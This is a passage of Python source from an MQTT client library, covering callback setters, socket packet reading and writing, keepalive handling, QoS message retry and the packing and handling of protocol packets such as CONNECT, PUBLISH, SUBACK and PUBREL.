handshakes have completed. For QoS 0, this simply means that the message
has left the client.
This callback is important because even if the publish() call returns
success, it does not always mean that the message has been sent."""
return self._on_publish
@on_publish.setter
def on_publish(self, func):
""" Define the published message callback implementation.
Expected signature is:
on_publish_callback(client, userdata, mid)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
mid: matches the mid variable returned from the corresponding
publish() call, to allow outgoing messages to be tracked.
"""
with self._callback_mutex:
self._on_publish = func
@property
def on_unsubscribe(self):
"""If implemented, called when the broker responds to an unsubscribe
request."""
return self._on_unsubscribe
@on_unsubscribe.setter
def on_unsubscribe(self, func):
""" Define the unsubscribe callback implementation.
Expected signature is:
unsubscribe_callback(client, userdata, mid)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
mid: matches the mid variable returned from the corresponding
unsubscribe() call.
"""
with self._callback_mutex:
self._on_unsubscribe = func
@property
def on_disconnect(self):
"""If implemented, called when the client disconnects from the broker.
"""
return self._on_disconnect
@on_disconnect.setter
def on_disconnect(self, func):
""" Define the disconnect callback implementation.
Expected signature is:
disconnect_callback(client, userdata, rc)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
rc: the disconnection result
The rc parameter indicates the disconnection state. If
MQTT_ERR_SUCCESS (0), the callback was called in response to
a disconnect() call. If any other value the disconnection
was unexpected, such as might be caused by a network error.
"""
with self._callback_mutex:
self._on_disconnect = func
@property
def on_socket_open(self):
"""If implemented, called just after the socket was opend."""
return self._on_socket_open
@on_socket_open.setter
def on_socket_open(self, func):
"""Define the socket_open callback implementation.
This should be used to register the socket to an external event loop for reading.
Expected signature is:
socket_open_callback(client, userdata, sock)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
sock: the socket which was just opened.
"""
with self._callback_mutex:
self._on_socket_open = func
def _call_socket_open(self):
"""Call the socket_open callback with the just-opened socket"""
with self._callback_mutex:
if self.on_socket_open:
with self._in_callback_mutex:
try:
self.on_socket_open(self, self._userdata, self._sock)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_socket_open: %s', err)
@property
def on_socket_close(self):
"""If implemented, called just before the socket is closed."""
return self._on_socket_close
@on_socket_close.setter
def on_socket_close(self, func):
"""Define the socket_close callback implementation.
This should be used to unregister the socket from an external event loop for reading.
Expected signature is:
socket_close_callback(client, userdata, sock)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
sock: the socket which is about to be closed.
"""
with self._callback_mutex:
self._on_socket_close = func
def _call_socket_close(self, sock):
"""Call the socket_close callback with the about-to-be-closed socket"""
with self._callback_mutex:
if self.on_socket_close:
with self._in_callback_mutex:
try:
self.on_socket_close(self, self._userdata, sock)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_socket_close: %s', err)
@property
def on_socket_register_write(self):
"""If implemented, called when the socket needs writing but can't."""
return self._on_socket_register_write
@on_socket_register_write.setter
def on_socket_register_write(self, func):
"""Define the socket_register_write callback implementation.
This should be used to register the socket with an external event loop for writing.
Expected signature is:
socket_register_write_callback(client, userdata, sock)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
sock: the socket which should be registered for writing
"""
with self._callback_mutex:
self._on_socket_register_write = func
def _call_socket_register_write(self):
"""Call the socket_register_write callback with the unwritable socket"""
if not self._sock or self._registered_write:
return
self._registered_write = True
with self._callback_mutex:
if self.on_socket_register_write:
try:
self.on_socket_register_write(self, self._userdata, self._sock)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_socket_register_write: %s', err)
@property
def on_socket_unregister_write(self):
"""If implemented, called when the socket doesn't need writing anymore."""
return self._on_socket_unregister_write
@on_socket_unregister_write.setter
def on_socket_unregister_write(self, func):
"""Define the socket_unregister_write callback implementation.
This should be used to unregister the socket from an external event loop for writing.
Expected signature is:
socket_unregister_write_callback(client, userdata, sock)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
sock: the socket which should be unregistered for writing
"""
with self._callback_mutex:
self._on_socket_unregister_write = func
def _call_socket_unregister_write(self, sock=None):
"""Call the socket_unregister_write callback with the writable socket"""
sock = sock or self._sock
if not sock or not self._registered_write:
return
self._registered_write = False
with self._callback_mutex:
if self.on_socket_unregister_write:
try:
self.on_socket_unregister_write(self, self._userdata, sock)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_socket_unregister_write: %s', err)
def message_callback_add(self, sub, callback):
"""Register a message callback for a specific topic.
Messages that match 'sub' will be passed to 'callback'. Any
non-matching messages will be passed to the default on_message
callback.
Call multiple times with different 'sub' to define multiple topic
specific callbacks.
Topic specific callbacks may be removed with
message_callback_remove()."""
if callback is None or sub is None:
raise ValueError("sub and callback must both be defined.")
with self._callback_mutex:
self._on_message_filtered[sub] = callback
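# Illustrative usage sketch: routing one topic filter to a dedicated handler
# while everything else falls through to on_message. The filter and handler
# names are placeholders and client is assumed to be connected.
#
#   def on_temperature(client, userdata, message):
#       print("temperature reading:", message.payload)
#
#   client.message_callback_add("sensors/+/temperature", on_temperature)
#   client.subscribe("sensors/#")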
def message_callback_remove(self, sub):
"""Remove a message callback previously registered with
message_callback_add()."""
if sub is None:
raise ValueError("sub must defined.")
with self._callback_mutex:
try:
del self._on_message_filtered[sub]
except KeyError: # no such subscription
pass
# ============================================================
# Private functions
# ============================================================
def _loop_rc_handle(self, rc):
if rc:
self._sock_close()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
with self._callback_mutex:
if self.on_disconnect:
with self._in_callback_mutex:
try:
self.on_disconnect(self, self._userdata, rc)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_disconnect: %s', err)
return rc
def _packet_read(self):
# This gets called if pselect() indicates that there is network data
# available - ie. at least one byte. What we do depends on what data we
# already have.
# If we've not got a command, attempt to read one and save it. This should
# always work because it's only a single byte.
# Then try to read the remaining length. This may fail because it may
# be more than one byte - will need to save data pending next read if it
# does fail.
# Then try to read the remaining payload, where 'payload' here means the
# combined variable header and actual payload. This is the most likely to
# fail due to longer length, so save current data and current position.
# After all data is read, send to _mqtt_handle_packet() to deal with.
# Finally, free the memory and reset everything to starting conditions.
if self._in_packet['command'] == 0:
try:
command = self._sock_recv(1)
except WouldBlockError:
return MQTT_ERR_AGAIN
except socket.error as err:
self._easy_log(MQTT_LOG_ERR, 'failed to receive on socket: %s', err)
return 1
else:
if len(command) == 0:
return 1
command, = struct.unpack("!B", command)
self._in_packet['command'] = command
if self._in_packet['have_remaining'] == 0:
# Read remaining
# Algorithm for decoding taken from pseudo code at
# http://publib.boulder.ibm.com/infocenter/wmbhelp/v6r0m0/topic/com.ibm.etools.mft.doc/ac10870_.htm
while True:
try:
byte = self._sock_recv(1)
except WouldBlockError:
return MQTT_ERR_AGAIN
except socket.error as err:
self._easy_log(MQTT_LOG_ERR, 'failed to receive on socket: %s', err)
return 1
else:
if len(byte) == 0:
return 1
byte, = struct.unpack("!B", byte)
self._in_packet['remaining_count'].append(byte)
# Max 4 bytes length for remaining length as defined by protocol.
# Anything more likely means a broken/malicious client.
if len(self._in_packet['remaining_count']) > 4:
return MQTT_ERR_PROTOCOL
self._in_packet['remaining_length'] += (byte & 127) * self._in_packet['remaining_mult']
self._in_packet['remaining_mult'] = self._in_packet['remaining_mult'] * 128
if (byte & 128) == 0:
break
self._in_packet['have_remaining'] = 1
self._in_packet['to_process'] = self._in_packet['remaining_length']
while self._in_packet['to_process'] > 0:
try:
data = self._sock_recv(self._in_packet['to_process'])
except WouldBlockError:
return MQTT_ERR_AGAIN
except socket.error as err:
self._easy_log(MQTT_LOG_ERR, 'failed to receive on socket: %s', err)
return 1
else:
if len(data) == 0:
return 1
self._in_packet['to_process'] -= len(data)
self._in_packet['packet'] += data
# All data for this packet is read.
self._in_packet['pos'] = 0
rc = self._packet_handle()
# Free data and reset values
self._in_packet = {
'command': 0,
'have_remaining': 0,
'remaining_count': [],
'remaining_mult': 1,
'remaining_length': 0,
'packet': b"",
'to_process': 0,
'pos': 0}
with self._msgtime_mutex:
self._last_msg_in = time_func()
return rc
def _packet_write(self):
self._current_out_packet_mutex.acquire()
while self._current_out_packet:
packet = self._current_out_packet
try:
write_length = self._sock_send(packet['packet'][packet['pos']:])
except (AttributeError, ValueError):
self._current_out_packet_mutex.release()
return MQTT_ERR_SUCCESS
except WouldBlockError:
self._current_out_packet_mutex.release()
return MQTT_ERR_AGAIN
except socket.error as err:
self._current_out_packet_mutex.release()
self._easy_log(MQTT_LOG_ERR, 'failed to send on socket: %s', err)
return 1
if write_length > 0:
packet['to_process'] -= write_length
packet['pos'] += write_length
if packet['to_process'] == 0:
if (packet['command'] & 0xF0) == PUBLISH and packet['qos'] == 0:
with self._callback_mutex:
if self.on_publish:
with self._in_callback_mutex:
try:
self.on_publish(self, self._userdata, packet['mid'])
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_publish: %s', err)
packet['info']._set_as_published()
if (packet['command'] & 0xF0) == DISCONNECT:
self._current_out_packet_mutex.release()
with self._msgtime_mutex:
self._last_msg_out = time_func()
with self._callback_mutex:
if self.on_disconnect:
with self._in_callback_mutex:
try:
self.on_disconnect(self, self._userdata, 0)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_disconnect: %s', err)
self._sock_close()
return MQTT_ERR_SUCCESS
with self._out_packet_mutex:
if len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.popleft()
else:
self._current_out_packet = None
else:
break
self._current_out_packet_mutex.release()
with self._msgtime_mutex:
self._last_msg_out = time_func()
return MQTT_ERR_SUCCESS
def _easy_log(self, level, fmt, *args):
if self.on_log is not None:
buf = fmt % args
try:
self.on_log(self, self._userdata, level, buf)
except Exception:
# Can't _easy_log this, as we'll recurse until we break
pass # self._logger will pick this up, so we're fine
if self._logger is not None:
level_std = LOGGING_LEVEL[level]
self._logger.log(level_std, fmt, *args)
def _check_keepalive(self):
if self._keepalive == 0:
return MQTT_ERR_SUCCESS
now = time_func()
with self._msgtime_mutex:
last_msg_out = self._last_msg_out
last_msg_in = self._last_msg_in
if self._sock is not None and (now - last_msg_out >= self._keepalive or now - last_msg_in >= self._keepalive):
if self._state == mqtt_cs_connected and self._ping_t == 0:
self._send_pingreq()
with self._msgtime_mutex:
self._last_msg_out = now
self._last_msg_in = now
else:
self._sock_close()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
rc = 1
with self._callback_mutex:
if self.on_disconnect:
with self._in_callback_mutex:
try:
self.on_disconnect(self, self._userdata, rc)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_disconnect: %s', err)
def _mid_generate(self):
with self._mid_generate_mutex:
self._last_mid += 1
if self._last_mid == 65536:
self._last_mid = 1
return self._last_mid
@staticmethod
def _topic_wildcard_len_check(topic):
# Search for + or # in a topic. Return MQTT_ERR_INVAL if found.
# Also returns MQTT_ERR_INVAL if the topic string is too long.
# Returns MQTT_ERR_SUCCESS if everything is fine.
if b'+' in topic or b'#' in topic or len(topic) == 0 or len(topic) > 65535:
return MQTT_ERR_INVAL
else:
return MQTT_ERR_SUCCESS
@staticmethod
def _filter_wildcard_len_check(sub):
if (len(sub) == 0 or len(sub) > 65535
or any(b'+' in p or b'#' in p for p in sub.split(b'/') if len(p) > 1)
or b'#/' in sub):
return MQTT_ERR_INVAL
else:
return MQTT_ERR_SUCCESS
def _send_pingreq(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGREQ")
rc = self._send_simple_command(PINGREQ)
if rc == MQTT_ERR_SUCCESS:
self._ping_t = time_func()
return rc
def _send_pingresp(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGRESP")
return self._send_simple_command(PINGRESP)
def _send_puback(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBACK (Mid: %d)", mid)
return self._send_command_with_mid(PUBACK, mid, False)
def _send_pubcomp(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBCOMP (Mid: %d)", mid)
return self._send_command_with_mid(PUBCOMP, mid, False)
def _pack_remaining_length(self, packet, remaining_length):
remaining_bytes = []
while True:
byte = remaining_length % 128
remaining_length = remaining_length // 128
# If there are more digits to encode, set the top bit of this digit
if remaining_length > 0:
byte |= 0x80
remaining_bytes.append(byte)
packet.append(byte)
if remaining_length == 0:
# FIXME - this doesn't deal with incorrectly large payloads
return packet
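# Worked example of the variable-length encoding implemented above: each byte
# carries 7 bits of the value and the top bit marks that another byte follows.
# Encoding a remaining length of 321 (= 2*128 + 65):
#
#   321 % 128 = 65, 321 // 128 = 2 left  -> append 65 | 0x80 = 0xC1
#     2 % 128 =  2,   2 // 128 = 0 left  -> append 0x02
#
# so _pack_remaining_length(bytearray(), 321) returns bytearray(b'\xc1\x02').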
def _pack_str16(self, packet, data):
if isinstance(data, unicode):
data = data.encode('utf-8')
packet.extend(struct.pack("!H", len(data)))
packet.extend(data)
def _send_publish(self, mid, topic, payload=b'', qos=0, retain=False, dup=False, info=None):
# we assume that topic and payload are already properly encoded
assert not isinstance(topic, unicode) and not isinstance(payload, unicode) and payload is not None
if self._sock is None:
return MQTT_ERR_NO_CONN
command = PUBLISH | ((dup & 0x1) << 3) | (qos << 1) | retain
packet = bytearray()
packet.append(command)
payloadlen = len(payload)
remaining_length = 2 + len(topic) + payloadlen
if payloadlen == 0:
self._easy_log(
MQTT_LOG_DEBUG,
"Sending PUBLISH (d%d, q%d, r%d, m%d), '%s' (NULL payload)",
dup, qos, retain, mid, topic
)
else:
self._easy_log(
MQTT_LOG_DEBUG,
"Sending PUBLISH (d%d, q%d, r%d, m%d), '%s', ... (%d bytes)",
dup, qos, retain, mid, topic, payloadlen
)
if qos > 0:
# For message id
remaining_length += 2
self._pack_remaining_length(packet, remaining_length)
self._pack_str16(packet, topic)
if qos > 0:
# For message id
packet.extend(struct.pack("!H", mid))
packet.extend(payload)
return self._packet_queue(PUBLISH, packet, mid, qos, info)
def _send_pubrec(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREC (Mid: %d)", mid)
return self._send_command_with_mid(PUBREC, mid, False)
def _send_pubrel(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREL (Mid: %d)", mid)
return self._send_command_with_mid(PUBREL | 2, mid, False)
def _send_command_with_mid(self, command, mid, dup):
# For PUBACK, PUBCOMP, PUBREC, and PUBREL
if dup:
command |= 0x8
remaining_length = 2
packet = struct.pack('!BBH', command, remaining_length, mid)
return self._packet_queue(command, packet, mid, 1)
def _send_simple_command(self, command):
# For DISCONNECT, PINGREQ and PINGRESP
remaining_length = 0
packet = struct.pack('!BB', command, remaining_length)
return self._packet_queue(command, packet, 0, 0)
def _send_connect(self, keepalive, clean_session):
proto_ver = self._protocol
protocol = b"MQTT" if proto_ver >= MQTTv311 else b"MQIsdp" # hard-coded UTF-8 encoded string
remaining_length = 2 + len(protocol) + 1 + 1 + 2 + 2 + len(self._client_id)
connect_flags = 0
if clean_session:
connect_flags |= 0x02
if self._will:
remaining_length += 2 + len(self._will_topic) + 2 + len(self._will_payload)
connect_flags |= 0x04 | ((self._will_qos & 0x03) << 3) | ((self._will_retain & 0x01) << 5)
if self._username is not None:
remaining_length += 2 + len(self._username)
connect_flags |= 0x80
if self._password is not None:
connect_flags |= 0x40
remaining_length += 2 + len(self._password)
command = CONNECT
packet = bytearray()
packet.append(command)
# as per the mosquitto broker, if the MSB of this version is set
# to 1, then it treats the connection as a bridge
if self._client_mode == MQTT_BRIDGE:
proto_ver |= 0x80
self._pack_remaining_length(packet, remaining_length)
packet.extend(struct.pack("!H" + str(len(protocol)) + "sBBH", len(protocol), protocol, proto_ver, connect_flags,
keepalive))
self._pack_str16(packet, self._client_id)
if self._will:
self._pack_str16(packet, self._will_topic)
self._pack_str16(packet, self._will_payload)
if self._username is not None:
self._pack_str16(packet, self._username)
if self._password is not None:
self._pack_str16(packet, self._password)
self._keepalive = keepalive
self._easy_log(
MQTT_LOG_DEBUG,
"Sending CONNECT (u%d, p%d, wr%d, wq%d, wf%d, c%d, k%d) client_id=%s",
(connect_flags & 0x80) >> 7,
(connect_flags & 0x40) >> 6,
(connect_flags & 0x20) >> 5,
(connect_flags & 0x18) >> 3,
(connect_flags & 0x4) >> 2,
(connect_flags & 0x2) >> 1,
keepalive,
self._client_id
)
return self._packet_queue(command, packet, 0, 0)
def _send_disconnect(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending DISCONNECT")
return self._send_simple_command(DISCONNECT)
def _send_subscribe(self, dup, topics):
remaining_length = 2
for t, _ in topics:
remaining_length += 2 + len(t) + 1
command = SUBSCRIBE | (dup << 3) | 0x2
packet = bytearray()
packet.append(command)
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t, q in topics:
self._pack_str16(packet, t)
packet.append(q)
self._easy_log(
MQTT_LOG_DEBUG,
"Sending SUBSCRIBE (d%d, m%d) %s",
dup,
local_mid,
topics,
)
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _send_unsubscribe(self, dup, topics):
remaining_length = 2
for t in topics:
remaining_length += 2 + len(t)
command = UNSUBSCRIBE | (dup << 3) | 0x2
packet = bytearray()
packet.append(command)
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t in topics:
self._pack_str16(packet, t)
# topics_repr = ", ".join("'"+topic.decode('utf8')+"'" for topic in topics)
self._easy_log(
MQTT_LOG_DEBUG,
"Sending UNSUBSCRIBE (d%d, m%d) %s",
dup,
local_mid,
topics,
)
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _message_retry_check_actual(self, messages, mutex):
with mutex:
now = time_func()
for m in messages.values():
if m.timestamp + self._message_retry < now:
if m.state == mqtt_ms_wait_for_puback or m.state == mqtt_ms_wait_for_pubrec:
m.timestamp = now
m.dup = True
self._send_publish(
m.mid,
m.topic.encode('utf-8'),
m.payload,
m.qos,
m.retain,
m.dup
)
elif m.state == mqtt_ms_wait_for_pubrel:
m.timestamp = now
self._send_pubrec(m.mid)
elif m.state == mqtt_ms_wait_for_pubcomp:
m.timestamp = now
self._send_pubrel(m.mid)
def _message_retry_check(self):
self._message_retry_check_actual(self._out_messages, self._out_message_mutex)
self._message_retry_check_actual(self._in_messages, self._in_message_mutex)
def _messages_reconnect_reset_out(self):
with self._out_message_mutex:
self._inflight_messages = 0
for m in self._out_messages.values():
m.timestamp = 0
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
if m.qos == 0:
m.state = mqtt_ms_publish
elif m.qos == 1:
# self._inflight_messages = self._inflight_messages + 1
if m.state == mqtt_ms_wait_for_puback:
m.dup = True
m.state = mqtt_ms_publish
elif m.qos == 2:
# self._inflight_messages = self._inflight_messages + 1
if self._clean_session:
if m.state != mqtt_ms_publish:
m.dup = True
m.state = mqtt_ms_publish
else:
if m.state == mqtt_ms_wait_for_pubcomp:
m.state = mqtt_ms_resend_pubrel
else:
if m.state == mqtt_ms_wait_for_pubrec:
m.dup = True
m.state = mqtt_ms_publish
else:
m.state = mqtt_ms_queued
def _messages_reconnect_reset_in(self):
with self._in_message_mutex:
if self._clean_session:
self._in_messages = collections.OrderedDict()
return
for m in self._in_messages.values():
m.timestamp = 0
if m.qos != 2:
self._in_messages.pop(m.mid)
else:
# Preserve current state
pass
def _messages_reconnect_reset(self):
self._messages_reconnect_reset_out()
self._messages_reconnect_reset_in()
def _packet_queue(self, command, packet, mid, qos, info=None):
mpkt = {
'command': command,
'mid': mid,
'qos': qos,
'pos': 0,
'to_process': len(packet),
'packet': packet,
'info': info}
with self._out_packet_mutex:
self._out_packet.append(mpkt)
if self._current_out_packet_mutex.acquire(False):
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.popleft()
self._current_out_packet_mutex.release()
# Write a single byte to sockpairW (connected to sockpairR) to break
# out of select() if in threaded mode.
try:
self._sockpairW.send(sockpair_data)
except socket.error as err:
if err.errno != EAGAIN:
raise
if self._thread is None:
if self._in_callback_mutex.acquire(False):
self._in_callback_mutex.release()
return self.loop_write()
self._call_socket_register_write()
return MQTT_ERR_SUCCESS
def _packet_handle(self):
cmd = self._in_packet['command'] & 0xF0
if cmd == PINGREQ:
return self._handle_pingreq()
elif cmd == PINGRESP:
return self._handle_pingresp()
elif cmd == PUBACK:
return self._handle_pubackcomp("PUBACK")
elif cmd == PUBCOMP:
return self._handle_pubackcomp("PUBCOMP")
elif cmd == PUBLISH:
return self._handle_publish()
elif cmd == PUBREC:
return self._handle_pubrec()
elif cmd == PUBREL:
return self._handle_pubrel()
elif cmd == CONNACK:
return self._handle_connack()
elif cmd == SUBACK:
return self._handle_suback()
elif cmd == UNSUBACK:
return self._handle_unsuback()
else:
# If we don't recognise the command, return an error straight away.
self._easy_log(MQTT_LOG_ERR, "Error: Unrecognised command %s", cmd)
return MQTT_ERR_PROTOCOL
def _handle_pingreq(self):
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
self._easy_log(MQTT_LOG_DEBUG, "Received PINGREQ")
return self._send_pingresp()
def _handle_pingresp(self):
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
# No longer waiting for a PINGRESP.
self._ping_t = 0
self._easy_log(MQTT_LOG_DEBUG, "Received PINGRESP")
return MQTT_ERR_SUCCESS
def _handle_connack(self):
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
(flags, result) = struct.unpack("!BB", self._in_packet['packet'])
if result == CONNACK_REFUSED_PROTOCOL_VERSION and self._protocol == MQTTv311:
self._easy_log(
MQTT_LOG_DEBUG,
"Received CONNACK (%s, %s), attempting downgrade to MQTT v3.1.",
flags, result
)
# Downgrade to MQTT v3.1
self._protocol = MQTTv31
return self.reconnect()
elif (result == CONNACK_REFUSED_IDENTIFIER_REJECTED
and self._client_id == b''):
self._easy_log(
MQTT_LOG_DEBUG,
"Received CONNACK (%s, %s), attempting to use non-empty CID",
flags, result,
)
self._client_id = base62(uuid.uuid4().int, padding=22)
return self.reconnect()
if result == 0:
self._state = mqtt_cs_connected
self._reconnect_delay = None
self._easy_log(MQTT_LOG_DEBUG, "Received CONNACK (%s, %s)", flags, result)
with self._callback_mutex:
if self.on_connect:
flags_dict = {}
flags_dict['session present'] = flags & 0x01
with self._in_callback_mutex:
try:
self.on_connect(self, self._userdata, flags_dict, result)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_connect: %s', err)
if result == 0:
rc = 0
with self._out_message_mutex:
for m in self._out_messages.values():
m.timestamp = time_func()
if m.state == mqtt_ms_queued:
self.loop_write() # Process outgoing messages that have just been queued up
return MQTT_ERR_SUCCESS
if m.qos == 0:
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
rc = self._send_publish(
m.mid,
m.topic.encode('utf-8'),
m.payload,
m.qos,
m.retain,
m.dup,
)
if rc != 0:
return rc
elif m.qos == 1:
if m.state == mqtt_ms_publish:
self._inflight_messages += 1
m.state = mqtt_ms_wait_for_puback
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
rc = self._send_publish(
m.mid,
m.topic.encode('utf-8'),
m.payload,
m.qos,
m.retain,
m.dup,
)
if rc != 0:
return rc
elif m.qos == 2:
if m.state == mqtt_ms_publish:
self._inflight_messages += 1
m.state = mqtt_ms_wait_for_pubrec
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
rc = self._send_publish(
m.mid,
m.topic.encode('utf-8'),
m.payload,
m.qos,
m.retain,
m.dup,
)
if rc != 0:
return rc
elif m.state == mqtt_ms_resend_pubrel:
self._inflight_messages += 1
m.state = mqtt_ms_wait_for_pubcomp
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
rc = self._send_pubrel(m.mid)
if rc != 0:
return rc
self.loop_write() # Process outgoing messages that have just been queued up
return rc
elif result > 0 and result < 6:
return MQTT_ERR_CONN_REFUSED
else:
return MQTT_ERR_PROTOCOL
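    # Descriptive note: CONNACK return codes 1-5 (unacceptable protocol version,
    # identifier rejected, server unavailable, bad credentials, not authorised)
    # are all surfaced above as MQTT_ERR_CONN_REFUSED; only code 0 establishes
    # the session and triggers the requeueing of pending messages.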
def _handle_suback(self):
self._easy_log(MQTT_LOG_DEBUG, "Received SUBACK")
pack_format = "!H" + str(len(self._in_packet['packet']) - 2) + 's'
(mid, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = "!" + "B" * len(packet)
granted_qos = struct.unpack(pack_format, packet)
with self._callback_mutex:
if self.on_subscribe:
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
try:
self.on_subscribe(self, self._userdata, mid, granted_qos)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_subscribe: %s', err)
return MQTT_ERR_SUCCESS
def _handle_publish(self):
rc = 0
header = self._in_packet['command']
message = MQTTMessage()
message.dup = (header & 0x08) >> 3
message.qos = (header & 0x06) >> 1
message.retain = (header & 0x01)
pack_format = "!H" + str(len(self._in_packet['packet']) - 2) + 's'
(slen, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = '!' + str(slen) + 's' + str(len(packet) - slen) + 's'
(topic, packet) = struct.unpack(pack_format, packet)
if len(topic) == 0:
return MQTT_ERR_PROTOCOL
# Handle topics with invalid UTF-8
# This replaces an invalid topic with a message and the hex
# representation of the topic for logging. When the user attempts to
# access message.topic in the callback, an exception will be raised.
try:
print_topic = topic.decode('utf-8')
except UnicodeDecodeError:
print_topic = "TOPIC WITH INVALID UTF-8: " + str(topic)
message.topic = topic
if message.qos > 0:
pack_format = "!H" + str(len(packet) - 2) + 's'
(message.mid, packet) = struct.unpack(pack_format, packet)
message.payload = packet
self._easy_log(
MQTT_LOG_DEBUG,
"Received PUBLISH (d%d, q%d, r%d, m%d), '%s', ... (%d bytes)",
message.dup, message.qos, message.retain, message.mid,
print_topic, len(message.payload)
)
message.timestamp = time_func()
if message.qos == 0:
self._handle_on_message(message)
return MQTT_ERR_SUCCESS
elif message.qos == 1:
rc = self._send_puback(message.mid)
self._handle_on_message(message)
return rc
elif message.qos == 2:
rc = self._send_pubrec(message.mid)
message.state = mqtt_ms_wait_for_pubrel
with self._in_message_mutex:
self._in_messages[message.mid] = message
return rc
else:
return MQTT_ERR_PROTOCOL
def _handle_pubrel(self):
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid, = struct.unpack("!H", self._in_packet['packet'])
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREL (Mid: %d)", mid)
with self._in_message_mutex:
if mid in self._in_messages:
# Only pass the message on if we have removed it from the queue - this
# prevents multiple callbacks for the same message.
message = self._in_messages.pop(mid)
self._handle_on_message(message)
self._inflight_messages -= 1
if self._max_inflight_messages > 0:
with self._out_message_mutex:
rc = self._update_inflight()
if rc != MQTT_ERR_SUCCESS:
return rc
        # FIXME: this should only be done if the message is known.
        # If it is unknown, that is a protocol error and we should close the
        # connection. But since we don't have (on-disk) persistence for the
        # session, it is possible that we no longer know about this message.
        # Choose to acknowledge it anyway (and thus lose a message) rather
        # than hang. See #284.
return self._send_pubcomp(mid)
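    # Descriptive note: an inbound QoS 2 message follows the four-part exchange
    # PUBLISH -> PUBREC -> PUBREL -> PUBCOMP. _handle_publish() stores the
    # message in _in_messages and answers with PUBREC; the handler above
    # delivers it to the application exactly once when the sender's PUBREL
    # arrives, then completes the exchange with PUBCOMP.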
def _update_inflight(self):
        # Don't lock message_mutex here; the caller already holds it.
for m in self._out_messages.values():
if self._inflight_messages < self._max_inflight_messages:
if m.qos > 0 and m.state == mqtt_ms_queued:
self._inflight_messages += 1
if m.qos == 1:
m.state = mqtt_ms_wait_for_puback
elif m.qos == 2:
m.state = mqtt_ms_wait_for_pubrec
rc = self._send_publish(
m.mid,
m.topic.encode('utf-8'),
m.payload,
m.qos,
m.retain,
m.dup,
)
if rc != 0:
return rc
else:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def _handle_pubrec(self):
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid, = struct.unpack("!H", self._in_packet['packet'])
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREC (Mid: %d)", mid)
with self._out_message_mutex:
if mid in self._out_messages:
msg = self._out_messages[mid]
msg.state = mqtt_ms_wait_for_pubcomp
msg.timestamp = time_func()
return self._send_pubrel(mid)
return MQTT_ERR_SUCCESS
def _handle_unsuback(self):
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid, = struct.unpack("!H", self._in_packet['packet'])
self._easy_log(MQTT_LOG_DEBUG, "Received UNSUBACK (Mid: %d)", mid)
with self._callback_mutex:
if self.on_unsubscribe:
with self._in_callback_mutex:
try:
self.on_unsubscribe(self, self._userdata, mid)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_unsubscribe: %s', err)
return MQTT_ERR_SUCCESS
def _do_on_publish(self, mid):
with self._callback_mutex:
if self.on_publish:
with self._in_callback_mutex:
try:
self.on_publish(self, self._userdata, mid)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_publish: %s', err)
msg = self._out_messages.pop(mid)
msg.info._set_as_published()
if msg.qos > 0:
self._inflight_messages -= 1
if self._max_inflight_messages > 0:
rc = self._update_inflight()
if rc != MQTT_ERR_SUCCESS:
return rc
return MQTT_ERR_SUCCESS
def _handle_pubackcomp(self, cmd):
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid, = struct.unpack("!H", self._in_packet['packet'])
self._easy_log(MQTT_LOG_DEBUG, "Received %s (Mid: %d)", cmd, mid)
